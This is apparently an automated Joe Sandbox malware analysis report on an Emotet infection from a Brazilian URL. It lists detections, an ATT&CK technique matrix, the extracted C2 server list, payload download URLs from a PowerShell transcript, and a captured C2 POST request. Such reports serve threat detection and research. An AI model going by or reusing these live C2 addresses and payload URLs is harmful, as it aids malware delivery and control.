Loading ...

Play interactive tourEdit tour

Analysis Report http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:206892
Start date:07.02.2020
Start time:21:12:56
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 19s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:urldownload.jbs
Sample URL:http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.win@10/19@2/6
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 65.7% (good quality ratio 62.3%)
  • Quality average: 79.8%
  • Quality standard deviation: 28.7%
HCA Information:
  • Successful, ratio: 67%
  • Number of executed functions: 24
  • Number of non-executed functions: 482
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Excluded IPs from analysis (whitelisted): 13.107.3.128, 13.107.5.88, 52.109.88.8, 52.109.88.35, 52.114.128.10, 40.90.137.125, 40.90.137.126, 40.90.23.154, 51.105.249.223
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, client-office365-tas.msedge.net, afdo-tas-offload.trafficmanager.net, lgin.msa.trafficmanager.net, am3p.wns.notify.windows.com.akadns.net, prod.configsvc1.live.com.akadns.net, s-0001.s-msedge.net, mobile.pipe.aria.microsoft.com, e-0009.e-msedge.net, wns.notify.windows.com.akadns.net, prod.nexusrules.live.com.akadns.net, login.msa.msidentity.com, prd.col.aria.mobile.skypedata.akadns.net, pipe.skype.com, login.live.com, emea1.notify.windows.com.akadns.net, config.officeapps.live.com, officeclient.microsoft.com, pipe.prd.skypedata.akadns.net, config.edge.skype.com, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net, pipe.cloudapp.aria.akadns.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Emotet
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Initial sample is implementing a service and should be registered / started as service
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Hidden Files and Directories1Process Injection112Software Packing1Input Capture2System Time Discovery2Remote File Copy1Input Capture2Data Encrypted1Commonly Used Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaPowerShell4Port MonitorsAccessibility FeaturesDeobfuscate/Decode Files or Information11Network SniffingSecurity Software Discovery121Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesScripting11Accessibility FeaturesPath InterceptionScripting11Input CaptureFile and Directory Discovery2Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Cryptographic Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExecution through API2System FirmwareDLL Search Order HijackingObfuscated Files or Information121Credentials in FilesSystem Information Discovery37Logon ScriptsInput CaptureData EncryptedStandard Non-Application Layer Protocol3SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationExecution through Module Load1Shortcut ModificationFile System Permissions WeaknessMasquerading231Account ManipulationVirtualization/Sandbox Evasion2Shared WebrootData StagedScheduled TransferStandard Application Layer Protocol3Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User Interface1Modify Existing ServiceNew ServiceHidden Files and Directories1Brute ForceProcess Discovery2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentCommand-Line Interface11Path InterceptionScheduled TaskVirtualization/Sandbox Evasion2Two-Factor Authentication InterceptionApplication Window Discovery11Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionProcess Injection112Bash HistoryRemote System Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://ta-behesht.ir/images/Provx00a/Avira URL Cloud: Label: malware
Source: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/Avira URL Cloud: Label: phishing
Source: http://ourproductreview.in/pokjbg746ihrtr/a1kzwc/Avira URL Cloud: Label: malware
Source: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/3Avira URL Cloud: Label: phishing
Source: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/5Avira URL Cloud: Label: phishing
Source: http://tatcogroup.ir/wp-admin/UC/Avira URL Cloud: Label: malware
Source: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/9Avira URL Cloud: Label: phishing
Source: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/=Avira URL Cloud: Label: phishing
Source: http://tcpartner.ru/wp-includes/nr8/Avira URL Cloud: Label: malware
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\879.exeAvira: detection malicious, Label: TR/AD.Emotet.aouip
Found malware configurationShow sources
Source: LaunchWinApp.exe.6044.13.memstrMalware Configuration Extractor: Emotet {"C2 list": ["71.126.247.90/9VRKRX4VeY", "104.236.28.47/z97ZWdfizXfGwwe", "104.236.28.47:8080", "80.86.91.91:8080", "80.86.91.91/otfaQrdMERYnyFW", "98.239.119.52/eKuzQTBgBoX", "0.86.91.91:8080"]}
Multi AV Scanner detection for domain / URLShow sources
Source: sepi.org.brVirustotal: Detection: 8%Perma Link
Source: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/Virustotal: Detection: 21%Perma Link
Source: http://tcpartner.ru/wp-includes/nr8/Virustotal: Detection: 7%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\879.exeVirustotal: Detection: 45%Perma Link
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\Desktop\download\QDC5QK1.docJoe Sandbox ML: detected

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\879.exeCode function: 12_2_00428AA3 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlen,12_2_00428AA3
Source: C:\Users\user\879.exeCode function: 12_2_0042FC18 lstrlen,FindFirstFileA,FindClose,12_2_0042FC18
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00428AA3 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlen,13_2_00428AA3
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0042FC18 lstrlen,FindFirstFileA,FindClose,13_2_0042FC18

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2404300 ET CNC Feodo Tracker Reported CnC Server TCP group 1 192.168.2.5:49802 -> 104.236.28.47:8080
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /images/Provx00a/ HTTP/1.1Host: ta-behesht.irConnection: Keep-Alive
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknownTCP traffic detected without corresponding DNS query: 98.239.119.52
Source: unknownTCP traffic detected without corresponding DNS query: 98.239.119.52
Source: unknownTCP traffic detected without corresponding DNS query: 98.239.119.52
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.91
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.91
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.91
Source: unknownTCP traffic detected without corresponding DNS query: 104.236.28.47
Source: unknownTCP traffic detected without corresponding DNS query: 104.236.28.47
Source: unknownTCP traffic detected without corresponding DNS query: 104.236.28.47
Source: unknownTCP traffic detected without corresponding DNS query: 104.236.28.47
Source: unknownTCP traffic detected without corresponding DNS query: 104.236.28.47
Source: unknownTCP traffic detected without corresponding DNS query: 104.236.28.47
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /admin/assets/uploads/parts_service/61ywox9d8/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: sepi.org.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /images/Provx00a/ HTTP/1.1Host: ta-behesht.irConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: sepi.org.br
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /z97ZWdfizXfGwwe/Cx9BA/ HTTP/1.1Referer: http://104.236.28.47/z97ZWdfizXfGwwe/Cx9BA/Content-Type: multipart/form-data; boundary=---------------------------427870309695181User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 104.236.28.47:8080Content-Length: 4644Connection: Keep-AliveCache-Control: no-cache
Urls found in memory or binary dataShow sources
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp, LaunchWinApp.exe, 0000000D.00000002.2421255548.0000000000199000.00000004.00000001.sdmpString found in binary or memory: http://104.236.28.47/z97ZWdfizXfGwwe/Cx9BA/
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmpString found in binary or memory: http://104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmpString found in binary or memory: http://104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/.
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmpString found in binary or memory: http://104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/8/
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmpString found in binary or memory: http://104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/H
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmpString found in binary or memory: http://104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/LP9huDOLdT/hzs2Jh7RhkPtQ/x
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmpString found in binary or memory: http://104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/Q/
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmpString found in binary or memory: http://104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/t
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp, LaunchWinApp.exe, 0000000D.00000003.2268467832.0000000000829000.00000004.00000001.sdmpString found in binary or memory: http://71.126.247.90/9VRKRX4VeY/
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmpString found in binary or memory: http://71.126.247.90/9VRKRX4VeY/)
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmpString found in binary or memory: http://71.126.247.90/9VRKRX4VeY/63
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmpString found in binary or memory: http://71.126.247.90/9VRKRX4VeY/=
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmpString found in binary or memory: http://71.126.247.90/9VRKRX4VeY/es
Source: LaunchWinApp.exe, 0000000D.00000003.2349207058.0000000000829000.00000004.00000001.sdmpString found in binary or memory: http://80.86.91.91/otfaQrdMERYnyFWF/FJq67nt8LP9huDOLdT/hzs2Jh7RhkPtQ/
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmpString found in binary or memory: http://80.86.91.91:8080/otfaQrdMERYnyFWF/FJq67nt8LP9huDOLdT/hzs2Jh7RhkPtQ/
Source: LaunchWinApp.exe, 0000000D.00000003.2349207058.0000000000829000.00000004.00000001.sdmpString found in binary or memory: http://98.239.119.52/eKuzQTBgBoX/Ed6Na4LH7Tfp6v3/6XcTHH/lFom6PxxwyovtO2P8/C
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: PowerShell_transcript.124406.N+qwB_ba.20200207211426.txt.6.drString found in binary or memory: http://ourproductreview.in/pokjbg746ihrtr/a1kzwc/
Source: wget.exe, 00000002.00000002.1999256645.00000000001D0000.00000004.00000040.sdmp, cmdline.out.2.drString found in binary or memory: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/
Source: wget.exe, 00000002.00000002.1999256645.00000000001D0000.00000004.00000040.sdmpString found in binary or memory: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/3
Source: wget.exe, 00000002.00000002.1999256645.00000000001D0000.00000004.00000040.sdmpString found in binary or memory: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/5
Source: wget.exe, 00000002.00000002.1999256645.00000000001D0000.00000004.00000040.sdmpString found in binary or memory: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/9
Source: wget.exe, 00000002.00000002.1999256645.00000000001D0000.00000004.00000040.sdmpString found in binary or memory: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/=
Source: wget.exe, 00000002.00000002.1999256645.00000000001D0000.00000004.00000040.sdmpString found in binary or memory: http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/DC5QK1.4
Source: PowerShell_transcript.124406.N+qwB_ba.20200207211426.txt.6.drString found in binary or memory: http://ta-behesht.ir/images/Provx00a/
Source: PowerShell_transcript.124406.N+qwB_ba.20200207211426.txt.6.drString found in binary or memory: http://tatcogroup.ir/wp-admin/UC/
Source: PowerShell_transcript.124406.N+qwB_ba.20200207211426.txt.6.drString found in binary or memory: http://tcpartner.ru/wp-includes/nr8/
Source: PowerShell_transcript.124406.N+qwB_ba.20200207211426.txt.6.drString found in binary or memory: http://tepcian.utcc.ac.th/wp-admin/SquR/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://api.aadrm.com/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://api.diagnostics.office.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://api.onedrive.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://apis.live.net/v5.0/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://augloop.office.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://cdn.entity.
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://clients.config.office.net/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://config.edge.skype.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/documentvirality/prod/index.html
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/progressui/index.html
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://cr.office.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://dataservice.o365filtering.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://devnull.onenote.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://directory.services.
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://graph.ppe.windows.net
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://graph.ppe.windows.net/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://graph.windows.net
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://graph.windows.net/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://lifecycle.office.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://login.microsoftonline.com/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://login.windows.local
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://management.azure.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://management.azure.com/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://messaging.office.com/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://ncus-000.contentsync.
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://officeapps.live.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://onedrive.live.com
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://onedrive.live.com/embed?
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://powerlift.acompli.net
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: F8C2F178-B5C6-47E0-A2EE-4FF83CEFD400.4.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
